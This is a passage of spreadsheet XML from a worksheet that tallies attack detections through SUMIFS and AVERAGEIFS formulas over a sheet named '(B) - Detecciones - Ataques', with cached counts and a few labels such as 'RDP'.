        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>23</v>
      </c>
      <c r="CN38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>5</v>
      </c>
      <c r="CP38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>20</v>
      </c>
      <c r="CQ38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>2</v>
      </c>
      <c r="CR38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>127</v>
      </c>
      <c r="CT38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>8</v>
      </c>
      <c r="CU38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>1</v>
      </c>
      <c r="CW38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>2</v>
      </c>
      <c r="CY38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>0</v>
      </c>
      <c r="CZ38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>7</v>
      </c>
      <c r="DE38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>2</v>
      </c>
      <c r="DF38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>450</v>
      </c>
      <c r="DI38" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>112</v>
      </c>
      <c r="DJ38" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$ED3:$ED139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>13</v>
      </c>
      <c r="DK38" s="271"/>
      <c r="DO38" s="357"/>
      <c r="DP38" s="358" t="s">
        <v>357</v>
      </c>
      <c r="DQ38" s="359">
        <v>1.0</v>
      </c>
      <c r="DR38" s="359">
        <v>2.0</v>
      </c>
      <c r="DS38" s="359">
        <v>3.0</v>
      </c>
      <c r="DT38" s="359">
        <v>3.0</v>
      </c>
      <c r="DU38" s="360">
        <v>4.0</v>
      </c>
      <c r="DV38" s="271"/>
      <c r="DW38" s="358" t="s">
        <v>357</v>
      </c>
      <c r="DX38" s="359">
        <v>1.0</v>
      </c>
      <c r="DY38" s="359">
        <v>2.0</v>
      </c>
      <c r="DZ38" s="359">
        <v>3.0</v>
      </c>
      <c r="EA38" s="359">
        <v>3.0</v>
      </c>
      <c r="EB38" s="360">
        <v>5.0</v>
      </c>
      <c r="EC38" s="271"/>
      <c r="ED38" s="280"/>
      <c r="EG38" s="279"/>
      <c r="EH38" s="271"/>
      <c r="EI38" s="358" t="s">
        <v>357</v>
      </c>
      <c r="EJ38" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI38,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AL$3:AL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S36 &amp; "*")</f>
        <v>3</v>
      </c>
      <c r="EK38" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BX$3:$BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI38,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!BX$3:BX$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI38 &amp; "*")</f>
        <v>13</v>
      </c>
      <c r="EL38" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI38,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DN$3:DN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI38 &amp; "*")</f>
        <v>27</v>
      </c>
      <c r="EM38" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI38,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FD$3:FD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $EI38 &amp; "*")</f>
        <v>56</v>
      </c>
      <c r="EN38" s="360">
        <f t="shared" si="4"/>
        <v>56</v>
      </c>
      <c r="EO38" s="364"/>
      <c r="EP38" s="364"/>
      <c r="EQ38" s="364"/>
      <c r="ER38" s="271"/>
      <c r="ES38" s="271"/>
      <c r="ET38" s="271"/>
      <c r="EU38" s="271"/>
      <c r="EV38" s="379" t="s">
        <v>357</v>
      </c>
      <c r="EW38" s="389">
        <f t="shared" si="8"/>
        <v>0.6</v>
      </c>
      <c r="EX38" s="389">
        <f t="shared" si="9"/>
        <v>2.6</v>
      </c>
      <c r="EY38" s="389">
        <f t="shared" si="10"/>
        <v>5.4</v>
      </c>
      <c r="EZ38" s="390">
        <f t="shared" si="11"/>
        <v>11.2</v>
      </c>
      <c r="FA38" s="367"/>
      <c r="FK38" s="303" t="s">
        <v>292</v>
      </c>
      <c r="FL38" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AP$3:AP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK38,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AP$3:AP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK38 &amp; "*")</f>
        <v>4</v>
      </c>
      <c r="FM38" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK38,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CB$3:CB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK38 &amp; "*")</f>
        <v>8</v>
      </c>
      <c r="FN38" s="68">
        <f>SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK38,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!DR$3:DR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK38 &amp; "*")</f>
        <v>11</v>
      </c>
      <c r="FO38" s="304">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FK38,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FH$3:FH$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FK38 &amp; "*")</f>
        <v>16</v>
      </c>
      <c r="FP38" s="392"/>
      <c r="FQ38" s="303" t="s">
        <v>292</v>
      </c>
      <c r="FR38" s="69">
        <f t="shared" ref="FR38:FU38" si="23">1-(FL38/EJ40)</f>
        <v>0</v>
      </c>
      <c r="FS38" s="69">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="FT38" s="69">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="FU38" s="306">
        <f t="shared" si="23"/>
        <v>0.4482758621</v>
      </c>
      <c r="FV38" s="392"/>
      <c r="FW38" s="392"/>
      <c r="FX38" s="392"/>
      <c r="FY38" s="392"/>
      <c r="FZ38" s="392"/>
      <c r="GA38" s="392"/>
      <c r="GB38" s="392"/>
      <c r="GC38" s="392"/>
      <c r="GD38" s="392"/>
      <c r="GE38" s="392"/>
      <c r="GF38" s="392"/>
      <c r="GG38" s="410" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"RDP")</f>
        <v>RDP</v>
      </c>
      <c r="GH38" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG38)</f>
        <v>0.8333333333</v>
      </c>
      <c r="GI38" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG38)</f>
        <v>0.8333333333</v>
      </c>
      <c r="GJ38" s="373">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG38)</f>
        <v>1</v>
      </c>
      <c r="GK38" s="410" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"RDP")</f>
        <v>RDP</v>
      </c>
      <c r="GL38" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$ET$3:$ET$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG38)</f>
        <v>0.25</v>
      </c>
      <c r="GM38" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG38)</f>
        <v>0.25</v>
      </c>
      <c r="GN38" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG38)</f>
        <v>0.5</v>
      </c>
      <c r="GO38" s="410" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"RDP")</f>
        <v>RDP</v>
      </c>
      <c r="GP38" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DD$3:$DD$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG38)</f>
        <v>0.25</v>
      </c>
      <c r="GQ38" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG38)</f>
        <v>0.25</v>
      </c>
      <c r="GR38" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG38)</f>
        <v>0.5</v>
      </c>
      <c r="GS38" s="410" t="str">
        <f>IFERROR(__xludf.DUMMYFUNCTION("""COMPUTED_VALUE"""),"RDP")</f>
        <v>RDP</v>
      </c>
      <c r="GT38" s="368">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BN$3:$BN$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG38)</f>
        <v>0</v>
      </c>
      <c r="GU38" s="336">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG38)</f>
        <v>0</v>
      </c>
      <c r="GV38" s="374">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$L$3:$L$139,GG38)</f>
        <v>0</v>
      </c>
      <c r="GW38" s="392"/>
      <c r="GX38" s="392"/>
      <c r="GY38" s="392"/>
      <c r="GZ38" s="392"/>
      <c r="HA38" s="392"/>
      <c r="HB38" s="392"/>
      <c r="HC38" s="392"/>
      <c r="HD38" s="392"/>
      <c r="HE38" s="392"/>
      <c r="HF38" s="392"/>
      <c r="HG38" s="392"/>
      <c r="HH38" s="392"/>
      <c r="HI38" s="392"/>
      <c r="HJ38" s="392"/>
      <c r="HK38" s="392"/>
      <c r="HL38" s="392"/>
      <c r="HM38" s="392"/>
      <c r="HN38" s="392"/>
      <c r="HO38" s="392"/>
      <c r="HP38" s="392"/>
    </row>
    <row r="39">
      <c r="B39" s="277"/>
      <c r="C39" s="271"/>
      <c r="D39" s="271"/>
      <c r="E39" s="271"/>
      <c r="F39" s="271"/>
      <c r="G39" s="278"/>
      <c r="J39" s="277"/>
      <c r="K39" s="386" t="s">
        <v>2483</v>
      </c>
      <c r="L39" s="387" t="s">
        <v>2484</v>
      </c>
      <c r="M39" s="387" t="s">
        <v>2485</v>
      </c>
      <c r="N39" s="388" t="s">
        <v>2486</v>
      </c>
      <c r="O39" s="278"/>
      <c r="Q39" s="271"/>
      <c r="R39" s="386" t="s">
        <v>2482</v>
      </c>
      <c r="S39" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>7094</v>
      </c>
      <c r="T39" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>6950</v>
      </c>
      <c r="U39" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>139</v>
      </c>
      <c r="V39" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>21</v>
      </c>
      <c r="W39" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>2</v>
      </c>
      <c r="X39" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>14142</v>
      </c>
      <c r="Y39" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>17</v>
      </c>
      <c r="Z39" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>139805</v>
      </c>
      <c r="AA39" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>232</v>
      </c>
      <c r="AB39" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>144</v>
      </c>
      <c r="AC39" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>38</v>
      </c>
      <c r="AD39" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>168</v>
      </c>
      <c r="AE39" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>32</v>
      </c>
      <c r="AF39" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>1008</v>
      </c>
      <c r="AG39" s="271"/>
      <c r="AH39" s="386" t="s">
        <v>2482</v>
      </c>
      <c r="AI39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>7079</v>
      </c>
      <c r="AJ39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>13</v>
      </c>
      <c r="AL39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>1</v>
      </c>
      <c r="AM39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>6950</v>
      </c>
      <c r="AN39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>108</v>
      </c>
      <c r="AR39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>3</v>
      </c>
      <c r="AS39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>2</v>
      </c>
      <c r="AU39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>21</v>
      </c>
      <c r="AV39" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FT3:$FT139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>5</v>
      </c>
      <c r="AW39" s="355">
